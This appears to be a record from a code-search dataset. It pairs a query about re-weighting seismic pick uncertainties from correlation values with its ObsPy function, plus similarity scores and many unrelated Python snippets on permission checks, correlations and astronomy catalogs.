not SecurityManager.checkPermission(perm, object) :\n\t\t\t\tif verbose :\n\t\t\t\t\tself.permissionProblem(object, perm)\n\t\t\t\treturn 0\n\t\treturn 1", "def test_permission_list_ok(self):\n test_name = sys._getframe().f_code.co_name\n rv, output = self._execute('permission list')\n self.assertEqual(0, rv)\n self.assertEqual(self.expected_results[test_name], output)", "def oauth2_check_permissions(self, request, required_permissions,\n additional_permissions=None,\n fql_check=True, force_check=True):\n has_permissions = False\n\n req_perms = set(required_permissions.split(','))\n\n if 'oauth2_extended_permissions' in request.session:\n cached_perms = request.session['oauth2_extended_permissions']\n\n # so now, fb_sig_ext_perms seems to contain the right perms (!)\n\n if not force_check and cached_perms and req_perms.issubset(cached_perms):\n # Note that this has the potential to be out of date!\n has_permissions = True\n elif fql_check:\n # TODO allow option to use preload FQL for this?\n perms_query = required_permissions\n \n # Note that we can query additional permissions that we\n # don't require. This can be useful for optional\n # functionality (or simply for better caching)\n if additional_permissions:\n perms_query += ',' + additional_permissions\n \n perms_results = self.fql.query('select %s from permissions where uid=%s'\n % (perms_query, self.uid))[0]\n actual_perms = set()\n for permission, allowed in perms_results.items():\n if allowed == 1:\n actual_perms.add(permission)\n request.session['oauth2_extended_permissions'] = actual_perms\n has_permissions = req_perms.issubset(actual_perms)\n\n return has_permissions", "def checkExistanceOfFiles(imageFilename, maskFilename):\n\n if os.path.isfile(imageFilename) and os.path.isfile(maskFilename):\n return True\n\n return False", "def can_view_project_files(project, user):\n return can_access_project(project, user) and project.allow_file_downloads", "def has_necessary_permissions(perm_json, required_perms, all_required=True):\n\n # Make list if not required_perms is string\n if isinstance(required_perms, str) or isinstance(required_perms, unicode):\n list_perms = [required_perms]\n else:\n list_perms = required_perms\n\n # Loop and check presence\n is_permitted = True\n for perm_key in list_perms:\n is_present = lookup_permission(perm_json, perm_key)\n\n if all_required:\n # All required: AND operation\n is_permitted = is_permitted and is_present\n if not is_permitted:\n break\n else:\n # Atleast one required: OR operation\n is_permitted = is_permitted or is_present\n\n\n return is_permitted", "def can(self, permission_code_name):\n if permission_code_name in list(self.get_group_permissions().values_list('code_name', flat=True)):\n # match against group permissions first for common use case\n return True\n return permission_code_name in list(self.get_permissions().values_list('code_name', flat=True))", "def check_arguments(logger: logging.Logger = None):\n cFuncName = colored(os.path.basename(__file__), 'yellow') + ' - ' + colored(sys._getframe().f_code.co_name, 'green')\n\n # check & change working dir\n dStat['dir'] = os.path.dirname(Path(dStat['cli']['obsstatf']).resolve())\n dStat['obsstatf'] = os.path.basename(dStat['cli']['obsstatf'])\n\n if not amutils.changeDir(dStat['dir']):\n if logger is not None:\n logger.error('{func:s}: changing to directory {dir:s} failed'.format(dir=dStat['dir'], func=cFuncName))\n sys.exit(amc.E_DIR_NOT_EXIST)\n\n # check accessibilty of observation statistics file\n if not amutils.file_exists(fname=dStat['obsstatf'], logger=logger):\n if logger is not None:\n logger.error('{func:s}: observation file {file:s} not accessible'.format(file=dStat['obsstatf'], func=cFuncName))\n sys.exit(amc.E_FILE_NOT_EXIST)\n\n # create dir for storing the latex sections\n dStat['ltx']['path'] = os.path.join(dStat['dir'], 'ltx')\n if not amutils.mkdir_p(dStat['ltx']['path']):\n if logger is not None:\n logger.error('{func:s}: cannot create directory {dir:s} failed'.format(dir=dStat['ltx']['path'], func=cFuncName))\n sys.exit(amc.E_CREATE_DIR_ERROR)\n\n # check for accessibility of CVS database\n if not amutils.path_writable(os.path.dirname(dStat['cli']['cvsdb'])):\n if logger is not None:\n logger.error('{func:s}: cannot write to directory {dir:s} failed'.format(dir=colored(os.path.dirname(dStat['cli']['cvsdb']), 'red'), func=cFuncName))\n sys.exit(amc.E_PATH_NOT_WRITABLE)\n\n # check whether selected freq is available\n for clifreq in dStat['cli']['freqs']:\n if clifreq not in dStat['info']['freqs']:\n if logger is not None:\n logger.error('{func:s}: selected frequency {clifreq:s} is not available'.format(clifreq=colored(clifreq, 'red'), func=cFuncName))\n sys.exit(amc.E_NOAVAIL_FREQ)\n\n # extract YY and DOY from filename\n dStat['time']['YYYY'] = int(dStat['obsstatf'][12:16])\n dStat['time']['DOY'] = int(dStat['obsstatf'][16:19])\n # converting to date\n dStat['time']['date'] = datetime.strptime('{year:04d}-{doy:03d}'.format(year=dStat['time']['YYYY'], doy=dStat['time']['DOY']), \"%Y-%j\")", "def _require_owner_mod(self, path, owner, mode, must_exist=False):\n if not os.path.exists(path):\n if must_exist:\n self.logger.warning('\"%(path)s\" is required but not exist.' %\n {'path': path})\n return\n\n # get uid and file mode\n st = os.stat(path)\n uid = st.st_uid\n md = st.st_mode & 0777\n\n # log generator\n def make_log(rtype, require, current):\n self.logger.warning(\n '%(rtype)s of \"%(path)s\" is required to be %(require)s, '\n 'not %(current)s.' % {\n 'path': path,\n 'require': require,\n 'current': current,\n 'rtype': rtype\n })\n self.errcount += 1\n\n if uid != self._get_uid(owner):\n make_log('owner', owner, self._get_uname(uid))\n if md != mode:\n make_log('mode', oct(mode), oct(md))", "def check_permissions(user, actor_id, level):\n permissions = get_permissions(actor_id)\n for pem in permissions:\n if pem['user'] == user:\n if pem['level'] >= level:\n return True\n return False", "def has_permission(perm_json, perm_key):\n return lookup_permission(perm_json, perm_key)", "def test_files(*fns, test_nonzero=False, allow_pipes=False):\n\n for fn in fns:\n is_file = os.path.isfile(fn)\n is_pipe = pathlib.Path(fn).is_fifo()\n if allow_pipes:\n if not is_file or is_pipe:\n error('File \"{}\" does not exist.'.format(fn))\n else:\n if is_pipe:\n if not is_file:\n error('File \"{}\" is a process substitution or a device.'.format(fn))\n else:\n if not is_file:\n error('File \"{}\" does not exist.'.format(fn))\n\n if test_nonzero and not allow_pipes:\n if not file_sizes(fn)[0]:\n error('File \"{}\" has size 0.'.format(fn))", "def check_permission(\n owned_policies: PolicyContext, access_request: AccessRequest\n) -> Tuple[Scope, bool]:\n if access_request.operation == Permission.READ.value:\n scope = get_read_scope(owned_policies, access_request)\n return scope, len(scope) > 0\n return (\n [access_request.selector],\n is_write_allowed(owned_policies, access_request),\n )", "def check_action_permissions(self, request, action, obj=None):\n if action is None:\n self.permission_denied(request)\n\n for permission in self.get_permissions():\n if not permission.has_action_permission(request, self, action, obj):\n self.permission_denied(request)", "def test_has_perm_change(self):\n perm = \"change\"\n self.assertTrue(self.story.has_perm(self.user1, perm))\n self.assertFalse(self.story.has_perm(self.user2, perm))", "def check_filepat_valid(config, filepat, modname, objname, indent=''):\n\n cnts = [0] * NUMCNTS\n\n if pfwdefs.SW_FILEPATSECT not in config:\n error(indent, \"Missing filename pattern definition section (%s)\" % (pfwdefs.SW_FILEPATSECT))\n cnts[ERRCNT_POS] += 1\n elif filepat not in config[pfwdefs.SW_FILEPATSECT]:\n error(indent, \"module %s, %s - Missing definition for %s '%s'\" % (modname, objname, pfwdefs.SW_FILEPAT, filepat))\n cnts[ERRCNT_POS] += 1\n\n # todo: if pattern, check that all needed values exist\n\n return cnts", "def has_change_permissions_permission(self, request):\n return self.has_generic_permission(request, \"change_permissions\")", "def permissions_required(permissions):\n def decorator(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if not current_user.can(permissions):\n abort(403)\n return f(*args,**kwargs)\n return decorated_function\n\n return decorator", "def is_valid_file_and_directory(args):\n if is_valid_file(args) and is_valid_directory(args):\n return True\n return False" ]
[ "0.7191872", "0.68649065", "0.67243284", "0.6699847", "0.6546892", "0.6490462", "0.6473374", "0.6473374", "0.6460848", "0.64598584", "0.6364402", "0.6364259", "0.636375", "0.6361546", "0.6326846", "0.6268052", "0.62131613", "0.6208553", "0.6181878", "0.6179629", "0.6141624", "0.6122187", "0.6108162", "0.61049557", "0.6080555", "0.59932023", "0.59867954", "0.59865963", "0.5964479", "0.59568936", "0.59521604", "0.5857885", "0.577289", "0.5772605", "0.57709223", "0.5745109", "0.57358205", "0.5721722", "0.5721722", "0.57132095", "0.57121634", "0.5703128", "0.56951874", "0.56932163", "0.56915873", "0.5675976", "0.56589526", "0.5654458", "0.5637782", "0.56368244", "0.563356", "0.5623745", "0.56125295", "0.5607823", "0.56032205", "0.55798995", "0.55654526", "0.5563646", "0.5562727", "0.5553925", "0.55445266", "0.5528213", "0.55235696", "0.5501901", "0.54805076", "0.5472259", "0.54647654", "0.545832", "0.54579157", "0.54570264", "0.54522103", "0.5450175", "0.5447379", "0.5441432", "0.5440074", "0.5431865", "0.5430852", "0.54290324", "0.54276556", "0.54167384", "0.5412284", "0.54113984", "0.5410523", "0.54088277", "0.5408539", "0.53980964", "0.539217", "0.53859836", "0.5383695", "0.5378563", "0.53781", "0.5375251", "0.53744334", "0.5373469", "0.53700376", "0.53523934", "0.534395", "0.5341597", "0.5340253", "0.53390384" ]
0.66519415
4
Function to change pick uncertainties based upon correlation values (saved in pick Comment). This works inplace on the catalog.
def reweight_picks(cat): from obspy.core.event import QuantityError for ev in cat: for pk in ev.picks: if pk.phase_hint == 'P': ccval = float(pk.comments[0].text.split('=')[-1]) # Re-weight based on some scheme (less down-weighting) if ccval > 0.3: pk.time_errors = QuantityError(uncertainty=0.05) return cat
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def switch_cut_cor(self):\n if self.cut_cor == 41:\n self.cut_cor = 42\n elif self.cut_cor == 42:\n self.cut_cor = 41", "def change_mix_corr(self, \n q_values, lmax,\n new_corr,new_cospsi,\n **kwargs):\n PhaseRetriever.__init__(self,\n q_values, lmax, self.n_theta, self.n_phi,\n corr = new_corr, cospsi = new_cospsi,\n **kwargs)\n \n if self.normalize_cl:\n self.cl = self.norm_leg_coefs( self.cl )", "def reset_correlation(r2, polys, poly):\n \n polys[r2] = poly", "def _set_correlations(self) -> None:\n pass", "def correlations_cont_cat(self):\n \"\"\" Use ICC to define correlations, give box-plots for highly correlated pairs \"\"\"\n \n warnings.filterwarnings('ignore')\n \n # Print correlations and column names\n print('One-way ANOVA p-values - Predictors')\n for i,j,v in self.cont_cat_distance:\n print('{} and {} = {:.2}'.format(i,j,v))\n \n # Box plot of the highly correlated pairs\n for i,j,v in self.cont_cat_distance:\n fg,ax = plt.subplots(figsize=(12, 8))\n fg = self._dataset.boxplot(i, j, ax=ax, grid=False)\n plt.xticks(rotation=90)\n plt.show()", "def set_correlation(r1, r2, polys):\n \n poly_r2 = polys[r2]\n polys[r2] = polys[r1]\n return poly_r2", "def test_remove_autos_with_pols():\n test_array = np.ones((4, 3, 3, 11, 21))\n out_array = utils.remove_auto_correlations(test_array, axes=(1, 2))\n assert (4, 6, 11, 21) == out_array.shape", "def disableCorrelation( band=range(9,25) ) : \n enableCorrelation(band, False)", "def set_CriticsPick(self, value):\n super(SearchByReviewerInputSet, self)._set_input('CriticsPick', value)", "def uniformCrossover(self, cl):\n if cons.env.format_data.discrete_action: #Always crossover condition if the phenotype is discrete (if continuous phenotype, half the time phenotype crossover is performed instead)\n self_specified_atts = copy.deepcopy(self.specified_attributes)\n cl_specified_atts = copy.deepcopy(cl.specified_attributes)\n probability = 0.5 #Equal probability for attribute alleles to be exchanged.\n\n #Make list of attribute references appearing in at least one of the parents.-----------------------------\n combined_atts = []\n for i in self_specified_atts:\n combined_atts.append(i)\n for i in cl_specified_atts:\n if i not in combined_atts:\n combined_atts.append(i)\n elif not cons.env.format_data.attribute_info[i][0]: #Attribute specified in both parents, and the attribute is discrete (then no reason to cross over)\n combined_atts.remove(i)\n combined_atts.sort()\n #--------------------------------------------------------------------------------------------------------\n changed = False;\n for att in combined_atts: #Each condition specifies different attributes, so we need to go through all attributes in the dataset.\n att_info = cons.env.format_data.attribute_info[att]\n #-----------------------------\n ref = 0\n #if att in self.specified_attributes:\n if att in self_specified_atts:\n ref += 1\n #if att in cl.specified_attributes:\n if att in cl_specified_atts:\n ref += 1\n #-----------------------------\n\n if ref == 0: #Attribute not specified in either condition (Attribute type makes no difference)\n print(\"Error: UniformCrossover!\")\n pass\n\n elif ref == 1: #Attribute specified in only one condition - do probabilistic switch of whole attribute state (Attribute type makes no difference)\n if att in self_specified_atts and random.random() > probability:\n i = self.specified_attributes.index(att) #reference to the position of the attribute in the rule representation\n cl.condition.append(self.condition.pop(i)) #Take attribute from self and add to cl\n cl.specified_attributes.append(att)\n self.specified_attributes.remove(att)\n changed = True #Remove att from self and add to cl\n\n\n if att in cl_specified_atts and random.random() < probability:\n i = cl.specified_attributes.index(att) #reference to the position of the attribute in the rule representation\n self.condition.append(cl.condition.pop(i)) #Take attribute from self and add to cl\n self.specified_attributes.append(att)\n cl.specified_attributes.remove(att)\n changed = True #Remove att from cl and add to self.\n\n\n else: #Attribute specified in both conditions - do random crossover between state alleles. The same attribute may be specified at different positions within either classifier\n #-------------------------------------------------------\n # CONTINUOUS ATTRIBUTE\n #-------------------------------------------------------\n if att_info[0]:\n i_cl1 = self.specified_attributes.index(att) #pairs with self (classifier 1)\n i_cl2 = cl.specified_attributes.index(att) #pairs with cl (classifier 2)\n tmp_key = random.randint(0,3) #Make random choice between 4 scenarios, Swap minimums, Swap maximums, Self absorbs cl, or cl absorbs self.\n if tmp_key == 0: #Swap minimum\n temp = self.condition[i_cl1][0]\n self.condition[i_cl1][0] = cl.condition[i_cl2][0]\n cl.condition[i_cl2][0] = temp\n elif tmp_key == 1: #Swap maximum\n temp = self.condition[i_cl1][1]\n self.condition[i_cl1][1] = cl.condition[i_cl2][1]\n cl.condition[i_cl2][1] = temp\n else: #absorb range\n all_list = self.condition[i_cl1] + cl.condition[i_cl2]\n new_min = min(all_list)\n new_max = max(all_list)\n if tmp_key == 2: #self absorbs cl\n self.condition[i_cl1] = [new_min,new_max]\n #Remove cl\n cl.condition.pop(i_cl2)\n cl.specified_attributes.remove(att)\n else: #cl absorbs self\n cl.condition[i_cl2] = [new_min,new_max]\n #Remove self\n self.condition.pop(i_cl1)\n self.specified_attributes.remove(att)\n #-------------------------------------------------------\n # DISCRETE ATTRIBUTE\n #-------------------------------------------------------\n else:\n pass\n tmp_list1 = copy.deepcopy(self_specified_atts)\n tmp_list2 = copy.deepcopy(cl.specified_attributes)\n tmp_list1.sort()\n tmp_list2.sort()\n if changed and (tmp_list1 == tmp_list2):\n changed = False\n\n if self.action != cl.action and random.random() > probability:\n # Switch phenotypes of 2 classifiers if GA is run in match set\n temp = self.action\n self.action = cl.action\n cl.action = temp\n changed = True\n return changed\n #-------------------------------------------------------\n # CONTINUOUS PHENOTYPE CROSSOVER\n #-------------------------------------------------------\n elif random.random() < 0.5:\n return self.actionCrossover(cl)", "def prep_coco_cats():\n for coco_cat_id, transformed_cat_id_p1 in get_label_map().items():\n transformed_cat_id = transformed_cat_id_p1 - 1\n coco_cats[transformed_cat_id] = coco_cat_id\n coco_cats_inv[coco_cat_id] = transformed_cat_id", "def _cont_cat_corr_features_anova(self, p_val = 0.01, subsamplesize = 100, p_seed = 0):\n \"\"\" Use ICC to define correlations, give box-plots for highly correlated pairs \"\"\"\n # TODO add option to do Bonferroni correction to adjust p-value depending on number of variables\n \n warnings.filterwarnings('ignore')\n # List of pairs along with correlation above threshold\n cont_cat_corr_list = []\n \n seed(p_seed)\n rand_vals = sample(range(self._n_rows), k=subsamplesize)\n \n # Search for the highly correlated pairs\n for i in self._cont_index_predictors: \n for j in self._cat_index_predictors:\n formula = self._dataset.columns[i] + \" ~ \" + self._dataset.columns[j] \n model_fit = ols(formula, data=self._dataset.iloc[rand_vals,:]).fit()\n anova_model = anova_lm(model_fit)\n p = anova_model.iloc[0,4]\n if p < p_val:\n cont_cat_corr_list.append([p,i,j]) #store correlation and columns index\n \n # Order variables by level of correlation \n s_cont_cat_corr_list = sorted(cont_cat_corr_list,key=lambda x: abs(x[0]))\n \n cont_cat_corr_features = []\n\n for v,i,j in s_cont_cat_corr_list:\n cont_cat_corr_features.append([self._dataset.columns[i],self._dataset.columns[j],v])\n \n return cont_cat_corr_features", "def removePick(self):\n self.pnt = None\n vtkRenWin.delMarker(self.renWin)", "def localize_red_clump(star_catalog,close_cat_idx,log):\n\n def select_within_range(mags, colours, mag_min, mag_max, col_min, col_max):\n \"\"\"Function to identify the set of array indices with values\n between the range indicated\"\"\"\n\n idx1 = np.where(colours >= col_min)[0]\n idx2 = np.where(colours <= col_max)[0]\n idx3 = np.where(mags >= mag_min)[0]\n idx4 = np.where(mags <= mag_max)[0]\n idx = set(idx1).intersection(set(idx2))\n idx = idx.intersection(set(idx3))\n idx = list(idx.intersection(set(idx4)))\n\n return idx\n\n RC = photometry_classes.Star()\n\n inst_i = star_catalog['cal_ref_mag_ip'][close_cat_idx]\n inst_r = star_catalog['cal_ref_mag_rp'][close_cat_idx]\n inst_g = star_catalog['cal_ref_mag_gp'][close_cat_idx]\n cal_i = star_catalog['imag'][close_cat_idx]\n cal_r = star_catalog['rmag'][close_cat_idx]\n cal_g = star_catalog['gmag'][close_cat_idx]\n inst_ri = inst_r - inst_i # Catalogue column order is red -> blue\n inst_gi = inst_g - inst_i\n inst_gr = inst_g - inst_r\n cal_ri = cal_r - cal_i\n cal_gi = cal_g - cal_i\n cal_gr = cal_g - cal_r\n\n log.info('\\n')\n log.info('Localizing the Red Clump')\n log.info('Median (r-i), i: '+str(np.median(inst_ri))+', '+str(np.median(inst_i)))\n log.info('Median (g-i), i: '+str(np.median(inst_gi))+', '+str(np.median(inst_i)))\n log.info('Median (g-r), g: '+str(np.median(inst_gr))+', '+str(np.median(inst_g)))\n\n ri_min = 0.8\n ri_max = 1.2\n i_min = 15.5\n i_max = 16.5\n\n r_min = 16.2\n r_max = 17.5\n\n gi_min = 2.5\n gi_max = 3.5\n\n gr_min = 1.5\n gr_max = 2.2\n g_min = 17.8\n g_max = 19.5\n\n log.info('Selected Red Clump giants between:')\n log.info('i = '+str(i_min)+' to '+str(i_max))\n log.info('r = '+str(r_min)+' to '+str(r_max))\n log.info('(r-i) = '+str(ri_min)+' to '+str(ri_max))\n log.info('g = '+str(g_min)+' to '+str(g_max))\n log.info('(g-r) = '+str(gr_min)+' to '+str(gr_max))\n log.info('(g-i) = '+str(gi_min)+' to '+str(gi_max))\n\n idx = select_within_range(inst_i, inst_ri, i_min, i_max, ri_min, ri_max)\n\n (RC.ri, RC.sig_ri, RC.i, RC.sig_i) = calc_distribution_centroid_and_spread_2d(inst_ri[idx], inst_i[idx], use_iqr=True)\n\n idx = select_within_range(inst_r, inst_ri, r_min, r_max, ri_min, ri_max)\n\n (RC.r, RC.sig_r) = calc_distribution_centre_and_spread(inst_r[idx], use_iqr=True)\n\n idx = select_within_range(inst_g, inst_gr, g_min, g_max, gr_min, gr_max)\n\n (RC.gr, RC.sig_gr, RC.g, RC.sig_g) = calc_distribution_centroid_and_spread_2d(inst_gr[idx], inst_g[idx], use_iqr=True)\n\n idx = select_within_range(inst_g, inst_gi, g_min, g_max, gi_min, gi_max)\n\n (RC.gi, RC.sig_gi, RC.g, RC.sig_g) = calc_distribution_centroid_and_spread_2d(inst_gi[idx], inst_g[idx], use_iqr=True)\n\n log.info('\\n')\n log.info('Centroid of Red Clump Stars at:')\n log.info(RC.summary(show_mags=True))\n log.info(RC.summary(show_mags=False,show_colours=True))\n\n RC.transform_to_JohnsonCousins()\n\n log.info(RC.summary(show_mags=False,johnsons=True))\n\n return RC", "def reset_uncertainties(self):\n\n # Make a new temporary ExoParameter using the original self.template\n # dictionary and copy the uncertainty values.\n blank = ExoParameter(\"fake\", attr_dict=self.template)\n self.uncertainty = blank.uncertainty\n self.uncertainty_lower = blank.uncertainty_lower\n self.uncertainty_upper = blank.uncertainty_upper", "def isotropic_correction_back(self):\n return self.cartesian_map_array(self.IsotropicCorrection(self,'back'))", "def _correct_band(image, band_name, kvol, kvol0, f_iso, f_geo, f_vol):\n\t\t\tiso = ee.Image(f_iso)\n\t\t\tgeo = ee.Image(f_geo)\n\t\t\tvol = ee.Image(f_vol)\n\t\t\tpred = vol.multiply(kvol).add(geo.multiply(kvol)).add(iso).rename(['pred'])\n\t\t\tpred0 = vol.multiply(kvol0).add(geo.multiply(kvol0)).add(iso).rename(['pred0'])\n\t\t\tcfac = pred0.divide(pred).rename(['cfac'])\n\t\t\tcorr = image.select(band_name).multiply(cfac).rename([band_name])\n\t\t\treturn corr", "def corr(self):\n pass", "def preferred_rep(self):\n # reducing coefficients mod torsion\n if self.torsion != 'free':\n for key, value in self.items():\n self[key] = value % self.torsion\n\n # removing key:value pairs with value = 0\n zeros = [k for k, v in self.items() if not v]\n for key in zeros:\n del self[key]", "def fix_curvature(self) -> None:\n self.n1.fix = True\n self.n2.fix = True", "def testSetColorCorrectionTuple(self):\n self.node.color_corrections = tuple(self.color_corrections)\n\n # We need to convert self.color_corrections to a set then to a list\n # so the order matches\n self.assertEqual(\n list(set(self.color_corrections)),\n self.node.color_corrections\n )", "def _warn_meas_corr(self):\n corr_with = {}\n # iterate over all measurements constraining at least one fit obs.\n for name in self.get_measurements:\n m = flavio.classes.Measurement[name]\n # iterate over all fit obs. constrained by this measurement\n for obs in set(self.observables) & set(m.all_parameters):\n # the constraint on this fit obs.\n constraint = m._parameters[obs][1]\n # find all the other obs. constrained by this constraint\n for c, p in m._constraints:\n if c == constraint:\n par = p\n break\n for p in par:\n # if the other obs. are not fit obs., append them to the list\n if p not in self.observables:\n if p not in corr_with:\n corr_with[p] = [obs]\n else:\n corr_with[p].append(obs)\n # replace list by a Counter\n corr_with = {k: Counter(v) for k, v in corr_with.items() if v}\n # warn for all counts > 1\n for obs1, counter in corr_with.items():\n for obs2, count in counter.items():\n if count > 1:\n warnings.warn((\"{} of the measurements in the fit '{}' \"\n \"constrain both '{}' and '{}', but only the \"\n \"latter is included among the fit \"\n \"observables. This can lead to inconsistent \"\n \"results as the former is profiled over.\"\n ).format(count, self.name, obs1, obs2))\n return corr_with", "def testSetColorCorrectionSet(self):\n self.node.color_corrections = self.color_corrections\n\n # We need to convert self.color_corrections to a set then to a list\n # so the order matches\n self.assertEqual(\n list(set(self.color_corrections)),\n self.node.color_corrections\n )", "def isotropic_correction_front(self):\n return self.cartesian_map_array(self.IsotropicCorrection(self,'front'))", "def _fill_impropers_cross_maps(self) -> None:\n impropers, cross_maps = [], []\n for residue in self.residues:\n for improper in residue.impropers:\n impropers.append([self._id_to_index[x] for x in improper])\n for cross_map in residue.cross_maps:\n cross_maps.append([self._id_to_index[x] for x in cross_map])\n self.impropers, self.cross_maps = impropers, cross_maps", "def SetPRCatConstraint(self, model ) :\n tot = np.multiply(self.wish, self.dispo)\n for line in tot :\n for val in line :\n if not val : continue\n if self.bound>0 : model += val <= self.valBound\n elif self.bound<0 : model += val >= self.valBound", "def phenotypeCrossover(self, cl):\n changed = False\n if self.action[0] == cl.action[0] and self.action[1] == cl.action[1]:\n return changed\n else:\n tmp_key = random.random() < 0.5 #Make random choice between 4 scenarios, Swap minimums, Swap maximums, Children preserve parent phenotypes.\n if tmp_key: #Swap minimum\n temp = self.action[0]\n self.action[0] = cl.action[0]\n cl.action[0] = temp\n changed = True\n elif tmp_key: #Swap maximum\n temp = self.action[1]\n self.action[1] = cl.action[1]\n cl.action[1] = temp\n changed = True\n\n return changed", "def prune(self, threshold=0, with_multiplicity=False):\n coefs = self.eci if with_multiplicity else self.coefs\n bit_ids = [i for i, coef in enumerate(coefs) if abs(coef) < threshold]\n self.cluster_subspace.remove_corr_functions(bit_ids)\n\n # Update necessary attributes\n ids_complement = list(set(range(len(self.coefs))) - set(bit_ids))\n ids_complement.sort()\n self.coefs = self.coefs[ids_complement]\n\n if self._feat_matrix is not None:\n self._feat_matrix = self._feat_matrix[:, ids_complement]\n\n if hasattr(self, \"eci\"): # reset cache\n del self.eci\n\n if hasattr(self, \"cluster_interaction_tensors\"): # reset cache\n del self.cluster_interaction_tensors\n\n # reset the evaluator\n self._set_evaluator_data(set_orbits=True)", "def pick_up(self):", "def multi_precisions_correlate2(self):\n self.query_dict={'code':code2.value,'exchange':exchange2.value,\\\n 'structure':struct2.value,'element':element2.value,'properties':prop2.value}\n print ('POSTING', self.query_dict)\n if not self.query_dict['properties'] == 'Multi':\n self.query_api(endpoint='precvalue')\n self.prop_data = self.plot_data['s{}k'.format(self.properties)]\n self.energy_data = self.plot_data['sE0k'.format(self.properties)]\n layout_doc.children[4].children[1] = self.plot_precision_figure()", "def corr_val(df,figsize=(15,15),cmap=\"OrRd\",):\n\n # Calculate correlations\n corr = df.corr()\n \n # Create a mask of the same size as our correlation data\n mask = np.zeros_like(corr)\n \n # Set the upper values of the numpy array to \"True\" to ignore them\n mask[np.triu_indices_from(mask)] = True\n\n fig, ax = plt.subplots(figsize=figsize)\n \n # Mask=mask to hide the upper-right half of values (otherwise mirrored)\n sns.heatmap(corr, annot=True,cmap=\"Reds\",mask=mask)\n return fig, ax", "def _set_correlation_strength(self):\n\n if hasattr(self, 'correlation_strength_abcissa'):\n abcissa = self.correlation_strength_abcissa\n ordinates = [self.param_dict['correlation_param'+str(i+1)] for i in range(len(abcissa))]\n correlation_strength_spline = model_helpers.custom_spline(abcissa, ordinates, k=custom_len(abcissa)-1)\n self.correlation_strength = correlation_strength_spline(self.prim_galprop_bins)\n else:\n self.correlation_strength = np.repeat(self.param_dict['correlation_param1'], len(self.prim_galprop_bins))\n\n self.correlation_strength[self.correlation_strength > 1] = 1\n self.correlation_strength[self.correlation_strength <- 1] = -1\n\n self.correlation_strength = np.append(\n self.correlation_strength, self.correlation_strength[-1])", "def test_clone_retains_settings(self):\n\n class Number(Document):\n n = IntField()\n\n Number.drop_collection()\n\n qs = Number.objects\n qs_clone = qs.clone()\n assert qs._read_preference == qs_clone._read_preference\n assert qs._read_concern == qs_clone._read_concern\n\n qs = Number.objects.read_preference(ReadPreference.PRIMARY_PREFERRED)\n qs_clone = qs.clone()\n assert qs._read_preference == ReadPreference.PRIMARY_PREFERRED\n assert qs._read_preference == qs_clone._read_preference\n\n qs = Number.objects.read_concern({\"level\": \"majority\"})\n qs_clone = qs.clone()\n assert qs._read_concern.document == {\"level\": \"majority\"}\n assert qs._read_concern == qs_clone._read_concern\n\n Number.drop_collection()", "def old_recombine(self, parents):\n p1,p2 = parents[0].copy(), parents[1].copy()\n if random.random() < self.recombination_chance:\n # i'll cut a section that will be correspond to half of the gene\n # or lower. least being a fourth of the genetic information...\n to_cut = random.choice(range(int(len(p1)/4), int(len(p1)/2)+1))\n # insert recombination chance here, 90% as seen in class.\n p1[:to_cut],p2[:to_cut] = p2[:to_cut],p1[:to_cut]\n\n return [p1,p2]", "def test_remove_autos():\n test_array = np.ones((3, 3, 11, 21))\n out_array = utils.remove_auto_correlations(test_array, axes=(0, 1))\n assert (6, 11, 21) == out_array.shape", "def purify_selection(self, ch1_ch2_color_cut):\n\n # Read in the number count distribution file\n with open(self._field_number_dist, 'r') as f:\n field_number_distribution = json.load(f)\n field_number_counts = field_number_distribution['normalized_number_counts']\n color_bins = field_number_distribution['color_bins']\n color_bin_min, color_bin_max = np.min(color_bins), np.max(color_bins)\n\n # Create an interpolation of our number count distribution\n color_probability_distribution = interp1d(color_bins, field_number_counts)\n\n clusters_to_remove = []\n for cluster_id, cluster_info in self._catalog_dictionary.items():\n # Get the photometric catalog for the cluster\n se_catalog = cluster_info['catalog']\n\n # Compute the color and color errors for each object\n I1_I2_color = se_catalog['I1_MAG_APER4'] - se_catalog['I2_MAG_APER4']\n I1_I2_color_err = np.sqrt((2.5 * se_catalog['I1_FLUXERR_APER4'] /\n (se_catalog['I1_FLUX_APER4'] * np.log(10))) ** 2 +\n (2.5 * se_catalog['I2_FLUXERR_APER4'] /\n (se_catalog['I2_FLUX_APER4'] * np.log(10))) ** 2)\n\n # Convolve the error distribution for each object with the overall number count distribution\n def object_integrand(x):\n return norm(loc=I1_I2_color, scale=I1_I2_color_err).pdf(x) * color_probability_distribution(x)\n\n # Compute the probability contained within the selection region by each object's color error\n # def degree_of_membership(color, color_err):\n # color_prob_in_numer = quad(\n # lambda x: norm(loc=color, scale=color_err).pdf(x) * color_probability_distribution(x),\n # a=ch1_ch2_color_cut, b=color_bin_max)[0]\n # color_prob_in_denom = quad(\n # lambda x: norm(loc=color, scale=color_err).pdf(x) * color_probability_distribution(x),\n # a=color_bin_min, b=color_bin_max, args=(color, color_err))[0]\n # return color_prob_in_numer / color_prob_in_denom\n #\n # with MultiPool() as pool:\n # color_prob_in = pool.map(degree_of_membership, zip(I1_I2_color, I1_I2_color_err))\n color_prob_in_numer = quad_vec(object_integrand, a=ch1_ch2_color_cut, b=color_bin_max)[0]\n color_prob_in_denom = quad_vec(object_integrand, a=color_bin_min, b=color_bin_max)[0]\n color_prob_in = color_prob_in_numer / color_prob_in_denom\n\n # Store the degree of membership into the catalog\n se_catalog['SELECTION_MEMBERSHIP'] = color_prob_in\n\n # As objects with degrees of membership of 0 do not contribute to the sample, we can safely remove them.\n se_catalog = se_catalog[se_catalog['SELECTION_MEMBERSHIP'] > 0]\n\n # def new_color_prob(x, color, color_err, denom_idx):\n # return -1. * norm(loc=color, scale=color_err).pdf(x) * color_probability_distribution(x) / \\\n # color_prob_in_denom[denom_idx]\n\n # # Maximize the probability distribution\n # new_color = [minimize_scalar(new_color_prob, args=(color, color_err, denom_idx),\n # bounds=(np.min(color_bins), np.max(color_bins)), method='bounded').x\n # for denom_idx, (color, color_err) in enumerate(zip(I1_I2_color, I1_I2_color_err))]\n #\n # # Store the new color in the catalog\n # se_catalog['CORRECTED_COLOR'] = new_color\n #\n # # Select only objects that have a (new) color redder than our threshold\n # se_catalog = se_catalog[se_catalog['CORRECTED_COLOR'] >= ch1_ch2_color_cut]\n\n # If we have exhausted all objects from the catalog mark the cluster for removal otherwise update the\n # photometric catalog in our database\n if se_catalog:\n cluster_info['catalog'] = se_catalog\n else:\n clusters_to_remove.append(cluster_id)\n\n # Remove any cluster that has no objects surviving our selection cuts\n for 